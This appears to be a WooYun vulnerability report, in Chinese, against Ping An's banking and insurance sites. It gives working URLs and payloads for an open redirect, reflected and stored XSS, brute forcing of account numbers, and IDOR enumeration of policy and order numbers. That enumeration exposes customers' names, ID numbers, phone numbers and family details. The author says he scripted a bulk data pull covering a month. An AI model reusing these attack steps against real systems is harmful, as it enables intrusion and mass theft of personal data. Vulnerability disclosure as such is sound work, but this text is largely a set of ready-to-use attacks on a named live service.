WooYun.org

1、未验证的重定向
测试过程：
首先发现地址修改TargetResource=https://www.baidu.com
https://www.pingan.com.cn/pinganone/pa/accounts_overview/setPFToken.jsp?url=https://www.pingan.com.cn/idp/startSSO.ping?PartnerSpId=bankSP%26TargetResource=https://www.baidu.com 首先他是有domain=.pingan.com.cn判断，直接修改参数url是不成功的，之后它会302跳转到
https://www.pingan.com.cn/idp/startSSO.ping?PartnerSpId=bankSP&TargetResource=https://www.baidu.com 但是参数TargetResource没有验证。最终打开baidu.com

2、XSS跨站脚本
链接：http://notify.youku.com/notify/get.json?uid=1398356088903D8F&types=[%22umc_notice%22]&callback=QheaderModule.updateNoticeNumCallback%3Cscript%3Ealert(1)%3C/script%3E
参数：callback 这参数基本上每个功能都有通用性的。上面提供的xss链接不用登陆可以直接执行js：

3、XSS跨站脚本
链接：https://bank.pingan.com.cn/ibp/work/finance/historyTradeQry.do?pageIndex=1&destCardId=111/%3E%3Cscript%3Ealert(1)%3C/script%3E&buildStartDate=2015-05-01&buildEndDate=2015-06-01 参数destCardId 这个参数也特别常见，还有一些事比如账户ID的参数，如：
https://bank.pingan.com.cn/ibp/work/pension/historyTradeQry.do等等，这些都可以产生XSS，这里就不说了。参数位置都差不多，都是查询类卡号。

4、XSS跨站脚本
登陆个人网银后：
https://bank.pingan.com.cn/ibp/work/finance/historyTradeQry.do?pageIndex=1&destCardId=6230585"><script>alert(1)</script>&buildStartDate=2015-04-29&buildEndDate=2015-05-29
参数：destCardId

5、存储型XSS
账户添加功能中
https://www.pingan.com.cn/pinganone/pa/saveManualAccountJson.do?urlFrom=fromLeft
POST如下数据
{"operation":"add","todayDate":"2015-05-29","oldBeginDate":"","flag":"add","channel":"001","queryPath":"","accountType":"1","cateNo1":"AllSavings","accountName":"222\"<script>alert(1)</script>","amount":"10","currency":"156","relateUrl":"http://baidu.com","urlFrom":"fromLeft"}

在返回浏览多处都会执行js:

6、XSS跨站脚本
https://cz.pingan.com.cn/ibd/index.html#register/register/registerInputToaPage?mobile=222&email=33333111&toaType=1&isCredit=0&isLogin=1&birthDay=&onlineBankUser=1&isRich=0&isMoveMap=null&toaName=111"><script>alert(1)</script>
参数：mobile、email、toaName等都可以产生XSS

7、账户暴力猜解
https://bank.pingan.com.cn/ibp/work/gold/signAgreement1.do
参数acctNo可以暴力猜解账户号码。比如跑后两位100个：

以特征字符 “取款密码错误”|“无效卡号”来区分，可以得到所有有效账户ID。

8、越权查询(个人保单查询)
https://www.pingan.com.cn/cspi-internet/dwr/call/plaincall/QueryPersonDwrService.queryPersonPolMethod.dwr
参数：c0-param0如：c0-param0=string:PC01420333678252 需要把参数
page=/cspi-internet/toa/pension/queryPolList.do的值删掉，这个地址有一定的权限判断机制, 然后就可以按照分单号码来跑数据了。比如：我跑后三位(1000个)单号数据。

可以看到大部分都有客户数据的，如下：

看下页面显示：
随意找个，以PC01420333678370为例，

可以看到详细信息及配偶和子女的详细信息

且查看查看连带人的个人信息，这里也是可以遍历得到所有用户信息的。

9、内网信息泄露
https://www.pingan.com.cn/cspi-internet/toa/pension/insuranceCertificateExportPdf.do?polNo=GP011411&IdNo=11111119111&insuredName=%B9%AE%B6%AC%B6%AC&certNo=PC0142011111 参数随便填点错误号码 泄露内网IP:10.33.88.11

10、xss跨站脚本
链接：
http://www.pingan.com/pa18shopemt/do/apply/period?flowId=B0Kt3LOEGAsqF0Vd&beginDate=2015-06-12111<script>alert(1)</script>&periodUnit=0&applyPeriod=12 参数：beginDate直接赋值<script>alert(1)</script>

11、遍历保险订单号获取用户数据(可以脱裤了)
先说下问题在哪里，问题出在保险订单支付的环节上。

链接：https://www.pingan.com/pa18shopemt/do/payment/gotoPayment?orderNos=201500062459871&payEntry=002 参数：orderNos 为订单号
在支付的过程中发现存在以上链接，测试多次发现证明是订单号，并且返回用户N多敏感数据：

可以看到通过订单号可以直接获取用户姓名、身份证号、电话号码、电子邮箱、购买保险种类、保险金额、购买时间等等敏感信息。
经验判断应该可以跑数据简单脱裤了，给你跑下数据试试就知道了，Burp跑100个吧：

可以看到很完美的就跑出来了，且时间也不长，如果写个python脚本提数据还不是分分秒秒的事。
还有个链接要提下，链接：
http://www.pingan.com/pa18shopemt/do/payment/checkPay.do?shopOrders=201500062459169
这个链接也可以跑订单号，它不同于上个链接，这个链接可以得到订单号的状态，并且返回内容超快，测试Burp跑1000个超级快(线程够大服务不会断链接)，特征“不允许支付”表示订单支付完成了，订单不存在它会提示”订单不存在“如图：

最终我还是写了个python脚本，尝试的遍历了一下一个月内的数据。真的很多很多数据啊。。。。